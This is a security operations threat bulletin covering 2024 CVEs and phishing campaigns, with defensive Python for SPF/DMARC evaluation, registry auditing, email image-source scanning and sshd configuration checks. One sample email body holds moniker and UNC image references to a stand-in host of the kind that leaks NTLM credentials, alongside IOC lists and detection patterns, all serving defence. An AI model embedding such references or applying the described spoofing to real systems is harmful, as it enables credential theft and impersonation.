In our Threat Bulletins, our Security Operations Center (SOC) team analyzes and summarizes the most significant threats observed over the past several weeks. Each entry covers the adversary's tactics, the likely impact, and the concrete steps that reduce exposure, so that you can stay a step ahead of the attackers.
Source(s):
Entities:
- SMTP Server Providers, Email Service Providers, Domain Hosting Providers
Attack Vector:
- Weaknesses in how hosted email providers verify authenticated senders against the domain identities they are authorized to use, which undermines Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication, Reporting, and Conformance (DMARC) checks.
Risk Impact:
- Heightened risk of phishing campaign success resulting in account compromise or monetary loss.
- Reputational damage from spoofed email activity.
Detailed Description:
- Vulnerabilities CVE-2024-7208 and CVE-2024-7209 allow attackers to bypass DMARC, SPF, and DKIM email security mechanisms.
- CVE-2024-7208 enables an authenticated sender (any customer of the same hosting provider) to spoof the identity of a shared, hosted domain while still passing DMARC, SPF, and DKIM checks.
- CVE-2024-7209 exploits shared SPF records in multi-tenant hosting environments, allowing attackers to spoof email identities by leveraging network authorization.
- The vulnerabilities stem from inadequacies in verifying authenticated senders against authorized domain identities, leading to potential email impersonation.
- Attackers can exploit these weaknesses to send emails as anyone within the hosted domains, bypassing security checks.
Recommendations:
- Domain owners should publish SPF and DKIM records and a DNS-based DMARC policy (p=quarantine or p=reject) for every domain they own, so that receivers have an enforceable policy to apply against spoofing attempts.
- For stronger identity protection, domain owners should sign with their own DKIM key (their own selector and private key) rather than one shared with the hosting provider's other tenants, so that a DKIM pass is bound to their domain alone.
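The shared-SPF weakness behind CVE-2024-7209 can be reproduced with a toy SPF and DMARC evaluator. The following Python is an added example written for this bulletin, not code from the advisory or from any provider; the domain names, the 203.0.113.0/24 netblock and the DNS records are constructed for the scenario, and the evaluator supports only the ip4, include and all mechanisms.

```python
import ipaddress

# Constructed DNS TXT records for the scenario (hypothetical names, reserved
# example ranges; none of this is real infrastructure). Both tenants include
# the provider's shared SPF record, so the provider's entire outbound netblock
# is authorized to send for either domain.
DNS_TXT = {
    "victim.example":        "v=spf1 include:_spf.hosting.example -all",
    "tenant-b.example":      "v=spf1 include:_spf.hosting.example -all",
    "_spf.hosting.example":  "v=spf1 ip4:203.0.113.0/24 -all",
    "_dmarc.victim.example": "v=DMARC1; p=reject; aspf=r; adkim=r",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def spf_check(ip, domain, depth=0):
    """Minimal SPF evaluator: ip4, include and all mechanisms only.
    Returns pass / fail / softfail / neutral / none / permerror."""
    if depth > 10:                      # RFC 7208 lookup limit
        return "permerror"
    record = DNS_TXT.get(domain, "")
    if not record.startswith("v=spf1"):
        return "none"
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        if term.startswith("ip4:"):
            matched = addr in ipaddress.ip_network(term[4:], strict=False)
        elif term.startswith("include:"):
            matched = spf_check(ip, term[8:], depth + 1) == "pass"
        elif term == "all":
            matched = True
        else:
            continue                    # unsupported mechanism: skipped in this toy
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"


def org_domain(domain):
    """Toy organizational domain: last two labels (real code uses the PSL)."""
    return ".".join(domain.lower().split(".")[-2:])


def dmarc_check(header_from, envelope_from, ip, dkim_signing_domain=None):
    """DMARC result for a message: pass if SPF or DKIM passes *and* its
    identifier aligns (relaxed mode) with the RFC5322.From domain.
    dkim_signing_domain is the d= of an already verified DKIM signature.
    Returns (result, policy)."""
    record = DNS_TXT.get("_dmarc." + header_from)
    if not record:
        return "none", None
    tags = dict(kv.strip().split("=", 1) for kv in record.split(";") if "=" in kv)
    spf_aligned = (spf_check(ip, envelope_from) == "pass"
                   and org_domain(envelope_from) == org_domain(header_from))
    dkim_aligned = (dkim_signing_domain is not None
                    and org_domain(dkim_signing_domain) == org_domain(header_from))
    return ("pass" if spf_aligned or dkim_aligned else "fail"), tags.get("p", "none")


if __name__ == "__main__":
    # A co-tenant sends MAIL FROM <x@victim.example> through the provider's relay.
    print(dmarc_check("victim.example", "victim.example", "203.0.113.10"))  # ('pass', 'reject')
    # The same forgery from an IP outside the shared netblock.
    print(dmarc_check("victim.example", "victim.example", "198.51.100.7"))  # ('fail', 'reject')
```

The first call shows the problem: the co-tenant's message passes SPF for victim.example through the shared include, the envelope domain aligns with the From header, and DMARC passes even though the owner published p=reject. A DKIM signature under the owner's own selector is an identifier the co-tenant cannot produce, but it only helps if the domain also stops relying on the shared netblock in its SPF record, since an aligned SPF pass alone satisfies DMARC.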
Source(s):
Entities:
- Microsoft, APT33, APT34
Attack Vector:
- Exploitation of CVE-2017-11774, an Outlook security feature bypass vulnerability, to turn Microsoft Outlook into a command-and-control (C2) beacon.
Risk Impact:
- Remote execution of arbitrary code on compromised systems.
- Persistence and lateral movement within networks.
- Evasion of security software due to execution within the trusted Outlook process.
Detailed Description:
- CVE-2017-11774 is an Outlook security feature bypass vulnerability that allows an attacker to configure a malicious custom home page for an Outlook folder.
- Despite being patched in October 2017, the vulnerability persists as attackers can exploit Windows Registry values to configure Outlook’s WebView to point to a malicious site.
- The Specula framework demonstrates how this vulnerability can be used to set up an interactive Python web server, enabling attackers to serve and execute custom VBScript or JScript files from the compromised Outlook home page.
- The technique allows attackers to execute arbitrary commands with significant access to the local system and facilitates persistence and lateral movement.
- Because the scripts run inside Outlook, a trusted and signed process, attackers use the technique to evade detection by security software.
- CVE-2017-11774 has been used in targeted attacks against U.S. government agencies, with notable adoption by the Iranian-sponsored APT33 and APT34 cyber espionage groups.
- FireEye and other security researchers observed its use in broader campaigns starting in mid-2018.
Recommendations:
- Confirm the October 2017 patch is installed and apply the accompanying Microsoft workarounds; because the registry-based home page setting still works on patched systems, periodically audit the Outlook WebView registry values on endpoints and alert on unexpected URLs.
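One way to perform that audit offline is to export the Office hive from each user profile and scan the export for configured folder home pages. The following Python is an added example for this bulletin, not part of Specula or of any Microsoft tooling; the .reg text is constructed for the example (the 203.0.113.5 address is from a reserved range). It assumes the well-known location of the setting, Software\Microsoft\Office\<version>\Outlook\WebView\<folder> with a URL value, and the EnableRoamingFolderHomepages hardening value that Microsoft documented alongside the 2017 patch; check current Microsoft guidance for the exact values before relying on the second check.

```python
import re

# Constructed .reg export (what `reg export HKCU\Software\Microsoft\Office out.reg`
# would produce on a host where a folder home page has been planted).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\WebView\Inbox]
"URL"="http://203.0.113.5/home.html"
"Flags"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\WebView\Calendar]
"URL"=""

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security]
"EnableRoamingFolderHomepages"=dword:00000000
"""

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VAL_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')
WEBVIEW_RE = re.compile(r"\\Office\\\d+\.\d\\Outlook\\WebView\\", re.I)


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: raw_data}}."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group("key")
            keys[current] = {}
            continue
        m = VAL_RE.match(line)
        if m and current is not None:
            keys[current][m.group("name")] = m.group("data")
    return keys


def reg_string(raw):
    """Unquote a REG_SZ literal from a .reg file; other types are returned as-is."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return raw


def find_folder_homepages(text):
    """Return (key, url) for every Outlook WebView folder with a non-empty URL.
    Any Office version (15.0, 16.0, ...) and any folder name are matched;
    a legitimate deployment normally has no URL set at all."""
    hits = []
    for key, values in parse_reg(text).items():
        if WEBVIEW_RE.search(key) and "URL" in values:
            url = reg_string(values["URL"])
            if url:
                hits.append((key, url))
    return hits


def roaming_homepages_disabled(text):
    """True when EnableRoamingFolderHomepages under Outlook\\Security is 0
    (the hardening value from Microsoft's workaround; assumption, see lead-in)."""
    for key, values in parse_reg(text).items():
        if re.search(r"\\Outlook\\Security$", key, re.I):
            raw = values.get("EnableRoamingFolderHomepages", "")
            if raw.lower().startswith("dword:"):
                return int(raw[6:], 16) == 0
    return False


if __name__ == "__main__":
    for key, url in find_folder_homepages(SAMPLE_REG):
        print(f"folder home page set: {key} -> {url}")
    print("roaming home pages disabled:", roaming_homepages_disabled(SAMPLE_REG))
```

Run the scan against exports from every loaded user hive (HKU\<SID>), not just HKCU, since the value is per user; any non-empty URL that is not an approved internal page warrants an incident ticket.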
Source(s):
Entities:
- Microsoft, Morphisec
Attack Vector:
- Exploitation occurs via malicious image tags in Microsoft Outlook emails, leveraging unsafe parsing of composite monikers to achieve remote code execution (RCE).
Risk Impact:
- Remote code execution (RCE)
- NTLM credential leakage
- Potential unauthorized control over affected systems
- Theft of sensitive information without user interaction.
Detailed Description:
- CVE-2024-38021 is a vulnerability in Microsoft Outlook (rated Important by Microsoft, but assessed as critical by Morphisec) affecting how hyperlink objects are processed within image tags in emails.
- Attackers can exploit this flaw to embed composite monikers in image URLs, triggering unsafe parsing and allowing remote code execution.
- Despite a previous patch for a related vulnerability (CVE-2024-21413), the issue persists due to incomplete mitigation, as the HrPmonFromUrl method did not incorporate the security flag intended to block unsafe parsing.
Recommendations:
- The missing check (the BlockMkParseDisplayNameOnCurrentThread flag in HrPmonFromUrl) is Microsoft's to fix and is delivered in the July 2024 Office security update; administrators cannot toggle it themselves and should confirm the update is installed.
- Regularly monitor and apply security updates for Office applications.
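Until every client is patched, mail gateways can at least flag the shape of image reference that reaches the moniker parser: a file: URL or a UNC path in an img src, optionally with the "!" that turns it into a composite moniker. The following Python is an added example for this bulletin, not Morphisec's or Microsoft's code; the message body is constructed (the 203.0.113.9 address is from a reserved range), and the rule flags the delivery shape, not the bug itself.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Schemes an email client is expected to fetch images from. Anything else is
# handed to a different handler; file: and UNC paths reach the moniker parser.
WEB_SCHEMES = {"http", "https", "cid", "data"}

# Constructed message body for the example.
SAMPLE_BODY = """<html><body>
<p>Quarterly report for review.</p>
<img src="https://cdn.example.com/logo.png" alt="logo">
<img src="cid:part1.0001@example.com">
<img src="file:///\\\\203.0.113.9\\share\\pic.png!payload">
<img src="\\\\203.0.113.9\\share\\tracker.gif">
</body></html>"""


class ImgSrcCollector(HTMLParser):
    """Collect every <img src=...> value, including tags the client would hide."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value.strip())


def classify_src(src):
    """Reason string if src would not be treated as an ordinary web fetch:
    a UNC path, a file: URL (noting the '!' that marks a composite moniker),
    or any other unexpected scheme. None if the reference looks benign."""
    if src.startswith("\\\\"):
        return "UNC path"
    scheme = urlsplit(src).scheme.lower()
    if scheme == "file":
        return "file: URL" + (" with composite-moniker separator '!'" if "!" in src else "")
    if scheme and scheme not in WEB_SCHEMES:
        return f"unexpected scheme {scheme}:"
    return None


def scan_html(body):
    """Return [(src, reason)] for every image reference worth quarantining."""
    collector = ImgSrcCollector()
    collector.feed(body)
    hits = []
    for src in collector.srcs:
        reason = classify_src(src)
        if reason:
            hits.append((src, reason))
    return hits


if __name__ == "__main__":
    for src, reason in scan_html(SAMPLE_BODY):
        print(f"{reason:48s} {src}")
```

Both flagged references would also make the client attempt an SMB connection to the named host, which is the NTLM credential leakage listed above; a benign HTML newsletter has no reason to embed either shape.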
Source(s):
- https://www.bleepingcomputer.com/news/microsoft/zero-click-windows-tcp-ip-rce-impacts-all-systems-with-ipv6-enabled-patch-now/
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
Entities:
- Microsoft Windows
- TCP/IP Stack
- IPv6
Attack Vector:
- Remote Code Execution (RCE) via an integer underflow vulnerability in the Windows TCP/IP stack, specifically targeting systems with IPv6 enabled.
Risk Impact:
- System Compromise: The CVE-2024-38063 vulnerability allows remote, unauthenticated attackers to execute arbitrary code with SYSTEM privileges on any Windows system with IPv6 enabled. This could result in full system compromise, enabling attackers to install malware, exfiltrate data, or use the compromised machine to launch further attacks within a network.
- Wormable Threat: The vulnerability is considered “wormable,” meaning it could enable malware to spread automatically across networks without user interaction, similar to the infamous WannaCry ransomware. This significantly heightens the potential impact, especially in environments with interconnected systems.
Detailed Description:
- CVE-2024-38063 is a critical vulnerability in the Windows TCP/IP stack with a CVSSv3 score of 9.8. The flaw stems from an integer underflow that can be triggered by sending specially crafted IPv6 packets to a target system, resulting in a buffer overflow. Successful exploitation allows attackers to execute arbitrary code remotely on affected Windows 10, Windows 11, and Windows Server systems, including Server Core installations.
- Zero-Click Exploit: This is a zero-click vulnerability, meaning it requires no user interaction for the attack to succeed. An attacker can remotely exploit this flaw simply by sending crafted IPv6 packets. Microsoft has rated this vulnerability as “Exploitation More Likely,” indicating a high potential for attackers to develop reliable exploits quickly.
- Historical Context and Similar Vulnerabilities:
- CVE-2020-16898 and CVE-2020-16899 (“Ping of Death”): allowed RCE and DoS attacks using ICMPv6 Router Advertisement packets.
- CVE-2021-24086: Involved an IPv6 fragmentation bug that left Windows systems vulnerable to DoS attacks.
- CVE-2023-28231: A DHCPv6 flaw enabling RCE with a specially crafted call.
- These historical vulnerabilities demonstrate the ongoing risks associated with the IPv6 protocol in Windows, making timely patching and monitoring critical.
Recommendations:
- Apply the Latest Microsoft Security Updates Immediately:
- Microsoft released a patch on August 13, 2024, that addresses CVE-2024-38063. It is essential that all affected systems are updated as soon as possible, with priority given to those exposed to the internet.
- Consider Disabling IPv6 Temporarily:
- For organizations unable to apply the patch immediately, disabling IPv6 can remove the attack vector. However, this action should be taken with caution, as IPv6 is a core component of Windows, and disabling it may impact system functionality.
- Implement Network Segmentation:
- Network segmentation can limit lateral movement within an organization, helping contain any potential spread of malware if a system is compromised.
Source(s):
Entities:
- OpenVPN, Microsoft, Windows
Attack Vector:
- User Authentication Required: Attackers need valid user credentials, which may be obtained through methods such as purchasing on the dark web, using info stealers, or capturing NTLMv2 hashes.
- Exploitation: The vulnerabilities are exploited by chaining multiple bugs to achieve Remote Code Execution and Local Privilege Escalation.
Risk Impact:
- Full Control: Potential for complete control over targeted endpoints.
- Data Breaches: Risk of unauthorized access to sensitive information.
- System Compromise: Potential for system-wide compromise and manipulation.
- Bypassing Security: Ability to disable or bypass security measures like Microsoft Defender.
Detailed Description:
- Microsoft has identified four vulnerabilities in OpenVPN, affecting various platforms including Windows, Android, iOS, macOS, and BSD.
- These vulnerabilities, when chained together, can lead to severe security issues such as remote code execution (RCE) and local privilege escalation (LPE).
- The vulnerabilities include two CVEs related to OpenVPN’s Windows service, which can lead to unauthorized access and remote code execution.
- Additionally, flaws in the Windows TAP driver can cause a denial of service.
- Exploitation requires user credentials and a deep understanding of OpenVPN’s internals. Attackers can leverage these vulnerabilities to gain full control over systems, potentially leading to data breaches and system compromise.
Recommendations:
- Update OpenVPN: Upgrade to OpenVPN version 2.6.10 or 2.5.10 to mitigate these vulnerabilities.
Source(s):
Entities:
- OpenSSH
Attack Vector:
- Unauthenticated remote code execution via a signal-handler race condition in FreeBSD’s OpenSSH sshd (CVE-2024-7589).
Risk Impact:
- Allows attackers to remotely execute arbitrary code with elevated privileges (root access) on systems running the affected version of OpenSSH. This can lead to complete system compromise, allowing attackers to install malware, exfiltrate data, or further propagate attacks within the network.
Detailed Description:
- The vulnerability (CVE-2024-7589) in OpenSSH, which carries a CVSS score of 7.4, is a high-severity flaw that affects the FreeBSD operating system.
- The issue arises from a race condition due to a signal handler in sshd(8) calling a logging function that is not async-signal-safe.
- The signal handler is triggered when a client fails to authenticate within the LoginGraceTime (120 seconds by default).
- Since sshd(8) runs with root privileges and is not sandboxed, this race condition could allow an unauthenticated attacker to execute code remotely with root privileges.
- This vulnerability is related to a previously identified flaw, known as regreSSHion (CVE-2024-6387), stemming from the integration of blacklistd in OpenSSH in FreeBSD.
- The exploitation of this flaw could enable attackers to gain full control of the affected system.
Recommendations:
- Update: FreeBSD users should immediately apply the latest security patches and updates provided by the FreeBSD Project to mitigate this vulnerability.
- Temporary Mitigation: If updating is not possible, set LoginGraceTime to 0 in /etc/ssh/sshd_config and restart sshd(8). This will protect against remote code execution but could expose the system to denial-of-service attacks.
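Whether the mitigation is actually in force depends on the first LoginGraceTime directive sshd reads, so a commented-out line or a later duplicate does not count. The following Python audits an sshd_config for the effective value; it is an added example for this bulletin, not FreeBSD or OpenSSH code, and the two configuration fragments are constructed. It follows the sshd_config(5) rules that the first value wins, keywords are case-insensitive, "=" is an accepted separator, times accept s/m/h/d/w qualifiers, and LoginGraceTime is not valid inside a Match block.

```python
import re

# Constructed sshd_config fragments (not copied from a real host).
VULNERABLE_CFG = """# stock-looking configuration: the directive is commented out
Port 22
#LoginGraceTime 2m
PermitRootLogin no
UsePAM yes
"""

MITIGATED_CFG = """Port 22
LoginGraceTime 0
PermitRootLogin no
Match User backup
    PasswordAuthentication no
"""

DEFAULT_LOGIN_GRACE = 120   # sshd_config(5): default is 120 seconds

TIME_UNITS = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}


def parse_time(value):
    """sshd time format: bare seconds, or a sequence like 2m or 1h30m."""
    if value.isdigit():
        return int(value)
    total = 0
    for num, unit in re.findall(r"(\d+)([smhdw])", value.lower()):
        total += int(num) * TIME_UNITS[unit]
    return total


def login_grace_time(config_text):
    """Effective LoginGraceTime in seconds for the given sshd_config text."""
    in_match = False
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        m = re.match(r"^(\w+)(?:\s*=\s*|\s+)(.+)$", line)
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            in_match = True          # a Match block runs to the next Match or EOF
            continue
        if in_match:
            continue                 # LoginGraceTime cannot appear here
        if key == "logingracetime":
            return parse_time(val)   # first occurrence wins
    return DEFAULT_LOGIN_GRACE


def mitigated(config_text):
    """True only when the race window is closed (LoginGraceTime 0)."""
    return login_grace_time(config_text) == 0


if __name__ == "__main__":
    for name, cfg in (("vulnerable", VULNERABLE_CFG), ("mitigated", MITIGATED_CFG)):
        print(f"{name}: LoginGraceTime={login_grace_time(cfg)}s mitigated={mitigated(cfg)}")
```

On the host itself, sshd -T prints the effective configuration after all parsing, so "sshd -T | grep -i logingracetime" is the authoritative cross-check; the script is for auditing configs collected from many systems without running sshd on each.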
Source(s):
Entities:
- Microsoft Office 2016 and later (Office 2016, Office 2019, Office LTSC 2021, Microsoft 365 Apps for Enterprise)
Attack Vector:
- Exploitation of a zero-day information disclosure vulnerability via specially crafted files or compromised websites.
Risk Impact:
- Unauthorized access to protected information such as system status, configuration data, personal information, or connection metadata. Although exploitation likelihood is assessed as less likely by Microsoft, MITRE considers it highly probable.
Detailed Description:
- Vulnerability Identifier: CVE-2024-38200.
- Affected Versions: Multiple 32-bit and 64-bit Office versions including Office 2016, Office 2019, Office LTSC 2021, and Microsoft 365 Apps for Enterprise.
- Vulnerability Type: Information disclosure weakness.
- Exploit Scenario: In a web-based attack scenario, an attacker could:
- Host a malicious website or leverage a compromised site hosting user-provided content.
- Create a specially crafted file designed to exploit the vulnerability.
- The attacker must convince the user to visit the website and open the malicious file, typically via email or Instant Messenger.
- Current Status: Microsoft is developing security updates but has not announced a release date.
- Further Disclosure: More details about the vulnerability will be shared by Jim Rush in a “NTLM – The Last Ride” DEF CON talk, which will cover new bugs and techniques, including those bypassing existing CVE fixes.
Recommendations:
- Monitor for security updates from Microsoft and apply them as soon as they are released.
- Be cautious of unsolicited links and attachments in emails or messages to mitigate potential exploitation.
Source(s):
Entities:
- Cisco Smart Software Manager On-Prem (SSM On-Prem)
Attack Vector:
- Crafted HTTP requests that abuse an unverified password-change flow in the web interface.
Risk Impact:
- Allows attackers to remotely change any user password, including administrator accounts, potentially compromising the entire system.
Detailed Description:
- A severe vulnerability (CVE-2024-20419) in Cisco SSM On-Prem allows unauthenticated attackers to remotely change user passwords, including those for administrator accounts, via crafted HTTP requests.
- The vulnerability stems from improper implementation in the password-change process, enabling unauthorized access to the web UI or API with the privileges of the compromised user.
Recommendations:
- Admins should immediately upgrade to the fixed release, as there are no workarounds available.
Source(s):
- https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-abusing-cisco-smart-install-feature/
Entities:
- Cisco Smart Install (SMI) Protocol
Attack Vector:
- Exploitation of the legacy Cisco Smart Install protocol.
Risk Impact:
- Potential for sensitive data theft, unauthorized configuration changes, rogue account creation, and system compromise.
Detailed Description:
- The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert recommending the disabling of the legacy Cisco Smart Install (SMI) feature, which is being actively abused in recent cyberattacks.
- Threat actors are leveraging this protocol to steal sensitive data and compromise network devices.
- The SMI feature has a history of being targeted by hacking groups due to misconfiguration or failure to disable it, leading to serious security breaches.
Recommendations:
- Admins should immediately disable the legacy SMI protocol (on Cisco IOS and IOS XE, the global configuration command no vstack disables it, and show vstack config confirms the state) and review the additional guidance provided by the NSA on securing network infrastructure.
Source(s):
Entities:
- Cisco Small Business SPA 300 and SPA 500 Series IP Phones
Attack Vector:
- Specially crafted HTTP requests targeting the web-based management interface
Risk Impact:
- Allows remote, unauthenticated attackers to execute arbitrary commands with root privileges or cause denial of service on vulnerable devices.
Detailed Description:
- Cisco has issued a warning about several critical remote code execution (RCE) zero-day vulnerabilities in the end-of-life Small Business SPA 300 and SPA 500 series IP phones.
- These flaws include three critical buffer overflow vulnerabilities (CVE-2024-20450, CVE-2024-20452, CVE-2024-20454) that allow remote attackers to execute arbitrary commands with root privileges.
- Additionally, two high-severity flaws (CVE-2024-20451, CVE-2024-20453) could enable denial of service attacks.
- With no patches or workarounds available, affected users must transition to newer, supported models.
Recommendations:
- Users should immediately migrate to newer, supported Cisco IP phone models, such as the Cisco IP Phone 8841 or models from the Cisco 6800 series.
Source(s):
Entities:
- Windows 10, Windows 11, Windows Server
Attack Vector:
- Exploitation of zero-day vulnerabilities to downgrade OS components via the Windows Update process
Risk Impact:
- Allows attackers to reintroduce old vulnerabilities, bypass security features, and compromise fully patched systems, making them susceptible to thousands of past security flaws.
Detailed Description:
- SafeBreach security researcher Alon Leviev revealed at Black Hat 2024 that two zero-day vulnerabilities (CVE-2024-38202 and CVE-2024-21302) in Windows Update could be exploited to perform downgrade attacks on fully updated Windows systems.
- These attacks force devices to revert to older, vulnerable versions of OS components, making them susceptible to exploitation.
- This “Windows Downdate” attack is particularly dangerous because the downgrade is delivered through the update mechanism itself, so the system continues to report as fully patched while being exposed to a wide range of old security flaws; the researcher describes the attack as undetectable.
- Microsoft states that it is working on an update that will revoke outdated, unpatched VBS system files to mitigate the attack, but that update will take time to test.
Recommendations:
- Until a fix is released, follow the mitigation advice Microsoft provides in its advisories for CVE-2024-38202 and CVE-2024-21302.
Source(s):
Entities:
- Amazon SES, Tycoon 2FA Phish-kit
IOCs:
- Domains:
- v4l3n[.]delayawri[.]ru
- keqil[.]ticemi[.]com
- auto[.]economictimes[.]indiatimes[.]com
- b2bimg[.]economictimes[.]indiatimes[.]com
- cfo[.]economictimes[.]indiatimes[.]com
- cio[.]economictimes[.]indiatimes[.]com
- energy[.]economictimes[.]indiatimes[.]com
- realty[.]economictimes[.]indiatimes[.]com
- static[.]economictimes[.]indiatimes[.]com
- telecom[.]economictimes[.]indiatimes[.]com
- ciso[.]economictimes[.]indiatimes[.]com
- brandequity[.]economictimes[.]indiatimes[.]com
- Redirect Domains:
- clicktime[.]symantec[.]com
- away[.]vk[.]com
- brandequity[.]economictimes[.]indiatimes[.]com
- jyrepresentacao[.]com
- t4yzv[.]vereares[.]ru
- challenges[.]cloudflare[.]com
Attack Vector:
- Phishing emails sent through Amazon SES, containing fake document review requests.
- Use of complex URL redirects to obscure the final phishing site.
- Exploitation of multiple compromised domains and CDN services to deliver phishing content.
Risk Impact:
- Credential Theft: Users’ credentials are at risk as phishing forms capture sensitive information.
- Reputation Damage: Compromised domains and services used in the attack can damage their reputation.
- Financial Loss: Potential for financial loss due to credential theft leading to unauthorized access.
Detailed Description:
- The Tycoon 2FA phish-kit sends its lures through Amazon SES, so the messages carry valid authentication signatures from that infrastructure (SES signs outbound mail with DKIM) and clear basic email authentication checks, which makes them appear legitimate.
- These emails contain misleading content and redirect victims through a complex series of URLs.
- The phishing engine is obfuscated and communicates with a C2 server to collect stolen data.
- The attack involves various compromised and redirect domains and multiple content delivery networks and services to obfuscate it further.
Recommendations:
- Users should be cautious of unexpected email attachments and document review requests, and verify the legitimacy of links before clicking.
- Regularly update and review email filtering rules to identify and block phishing emails.
- Several hosts in the IOC list (for example clicktime[.]symantec[.]com and challenges[.]cloudflare[.]com) are legitimate services abused as intermediate redirectors; use them as hunting pivots in proxy logs rather than as outright block entries.
Source(s):
- https://thehackernews.com/2024/08/chinese-volt-typhoon-exploits-versa.html
- https://versa-networks.com/blog/versa-security-bulletin-update-on-cve-2024-39717-versa-director-dangerous-file-type-upload-vulnerability/
Entities:
- U.S. Internet Service Providers (ISP), Managed Service Providers (MSP), Global IT sectors, Versa Director users (including companies like Adobe, Barclays, T-Mobile, and Verizon)
Attack Vector:
- Zero-day vulnerability (CVE-2024-39717) in Versa Director, exploited to upload malicious files.
Indicators of Compromise:
- Malicious PNG image files used in “Change Favicon” functionality
- Web shell named “VersaMem” disguised as “VersaTest.png”
- Network traffic from SOHO devices to Versa Director servers on ports 4566 and 4570
Risk Impact:
- Compromise of administrative credentials
- Supply chain attacks targeting downstream customers
- Potential unauthorized access to critical infrastructure
Detailed Description:
- CVE-2024-39717: a dangerous-file-type upload vulnerability in Versa Director that lets an attacker holding administrator credentials upload arbitrary files through the “Change Favicon” feature, disguised as PNG images.
- Attackers exploited this flaw to deliver a custom web shell (“VersaMem”) designed to intercept and harvest credentials.
- The web shell is modular and operates in-memory, evading traditional file-based detection.
- Initial indicators of exploitation were identified as early as June 12, 2024, with the campaign believed to be ongoing.
- The earliest web shell sample was detected from Singapore on June 7, 2024.
- The attack primarily targets unpatched Versa Director systems, emphasizing the importance of timely updates.
Recommendations:
- Apply the latest patches for Versa Director (version 22.1.4 or later).
- Block external access to ports 4566 and 4570 on Versa Director servers.
- Conduct recursive searches for suspicious PNG files on affected systems.
- Monitor and analyze network traffic originating from SOHO devices to Versa Director ports.
- Enhance monitoring of authentication processes on Versa Director to detect potential credential harvesting.